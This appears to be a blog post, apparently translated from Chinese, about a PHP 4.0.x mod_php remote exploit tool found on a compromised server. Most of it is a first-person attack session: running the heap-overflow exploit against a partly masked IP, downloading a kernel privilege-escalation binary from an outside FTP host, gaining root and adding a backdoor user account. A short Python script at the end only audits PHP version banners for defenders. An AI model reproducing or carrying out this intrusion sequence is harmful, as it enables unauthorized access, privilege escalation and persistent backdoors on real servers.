[Title]: Found PHP v4.0.2rc1-v4.0.7RC2 exploit program
[Keywords]: PHP, v4.0.2rc1-v4.0.7RC2, exploit, program
[Source]: http://blog.chinaunix.net/article.php?articleId=38137&blogId=4631

Found PHP v4.0.2rc1-v4.0.7RC2 exploit program

The following tool was found on a compromised server:

fun

This tool is an exploit program written specifically to scan for PHP v4.0.2rc1-v4.0.7RC2. Once a target is found, it obtains a remote shell through a heap overflow; getting root from there is even simpler. Usage is as follows:

[root@linux_server tmp]# ./fun
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.

usage: ./fun [options]

Options:
  -c            check exploitability only, do not exploit
  -n            no check mode
  -s start      bruteforce start (top)
  -t target     choose target
                (1) PHP v4.0.2rc1-v4.0.5
                (2) PHP v4.0.6-v4.0.7RC2

In testing, a remote shell with apache privileges can be obtained. Local root can then be obtained with a kernel overflow program. In testing, a Redhat 7.2 server was rooted this way.

The procedure is as follows:

[bob@bob linux_server]$ ./fun -c 202.x.x.x /login.php        (verify the server's PHP version)
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.

+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6        (4.0.6, within the attackable range)
[bob@bob linux_server]$ ./fun -t 2 202.x.x.x  /login.php
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.

+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6

+ exploiting the bug now...

  [+++-------] trying: bffffecc        (it starts sending the overflow code to the remote server over and over)
  [++++++++
  [++++++++++
  [+++++++---] trying: bffffe80
  [+++++++++
  [++++++++++] trying: bffffde8
  [+---------] trying: bffffde4


  [++
  [+++++++---] trying: bffffc70
  [++++++++

  [++++++----] trying: bffff9d4
  [+++++++
  [++++++++
  [+++++-----] trying: bffff9a0
  [++++++
  [+++++++
  [++++++++++] trying: bffff688
  [++++++++++] trying: bffff5dc

+ done ...        (an hour and a half later, the system told me it had succeeded) :P

+ you should be connected to a dup-shell now
+ if not simply try again
command>
Linux manson 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31 EDT 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)        (I am now logged in remotely)


ls        (type ls, and below is the system's directory listing)
bin
boot
dev
etc
home
initrd
lib
lost+found
misc
mnt
opt
proc
root
sbin
tmp
usr
var
cd /tmp
ftp 219.x.x.x        (go fetch the kernel overflow code for 2.4.7-10)
bob
Password:buyllshit
Name (219.x.x.x:apache): Not logged in.        (damn, typed the password wrong)
Login failed.
by
ftp 219.x.x.x
bob
Password:bullshit        (correct this time)
cd backdoot
Name (219.x.x.x:apache): /backdoot: No such file or directory.        (typed the directory wrong)
cd backdoor
get xp        (got the local kernel overflow program)


by
chmod +x xp        (it is in the tmp directory; give the xp program execute permission)
./xp
[+] Attached to 17306
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...        (overflow succeeded)

useradd bob
/bin/sh: useradd: command not found        (my path probably lacks /usr/sbin, so I'll just go find it directly)

locate useradd
/etc/default/useradd
/usr/sbin/useradd
/usr/share/man/man8/useradd.8.gz
cd /usr/sbin
./useradd bob        (bob added)
passwd bob
New password: bullshit
BAD PASSWORD: it is based on a dictionary word
Retype new password: bullshit
Changing password for user bob
passwd: all authentication tokens updated successfully        (password changed successfully)

exit
exit

The next steps need no repeating: use SecureCRT to ssh in with the username and password you just set, then run that xp program again, and you are root.
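The tool's check mode above decides purely from the PHP version string the server announces ("server says PHP/4.0.6"). For an administrator auditing their own hosts, the same comparison can be done offline against collected response headers. This is an added example, not code from the original post or from the tool; the inclusive bounds come from the tool's usage banner, while the header names (X-Powered-By, Server) and the sample banners are assumptions constructed here.

```python
"""Audit PHP banners against the version range 7350fun targets (4.0.2rc1 .. 4.0.7RC2)."""
import re

# Inclusive bounds as printed in the tool's usage banner.
RANGE_LOW = "4.0.2rc1"
RANGE_HIGH = "4.0.7RC2"

# major.minor.patch with an optional rcN / RCN suffix, anchored at end of string.
_VER_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:\s*(?:rc|RC)\s*(\d+))?$")


def parse_version(text):
    """Turn '4.0.6', '4.0.7RC2' or 'PHP/4.0.6' into a comparable tuple.

    A release candidate sorts below its final release, so the pre-release
    component is (0, n) for RCn and (1, 0) for a final release.
    """
    m = _VER_RE.search(text.strip())
    if not m:
        raise ValueError("unrecognised version string: %r" % text)
    major, minor, patch, rc = m.groups()
    pre = (0, int(rc)) if rc is not None else (1, 0)
    return (int(major), int(minor), int(patch)) + pre


def is_in_targeted_range(version):
    """True if the version lies within [4.0.2rc1, 4.0.7RC2] inclusive."""
    v = parse_version(version)
    return parse_version(RANGE_LOW) <= v <= parse_version(RANGE_HIGH)


def audit_headers(headers):
    """Given a dict of HTTP response headers, return (php_version_or_None, targeted).

    Checks X-Powered-By first, then Server (assumed header names).
    """
    for name in ("X-Powered-By", "Server"):
        m = re.search(r"PHP/(\S+)", headers.get(name, ""))
        if m:
            return m.group(1), is_in_targeted_range(m.group(1))
    return None, False


if __name__ == "__main__":
    # Constructed sample banners, not captured from any real host.
    samples = [
        {"Server": "Apache/1.3.20 (Unix) PHP/4.0.6 mod_ssl/2.8.4"},
        {"X-Powered-By": "PHP/4.0.7"},
        {"Server": "Apache/2.0.40"},
    ]
    for hdrs in samples:
        print(hdrs, "->", audit_headers(hdrs))
```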
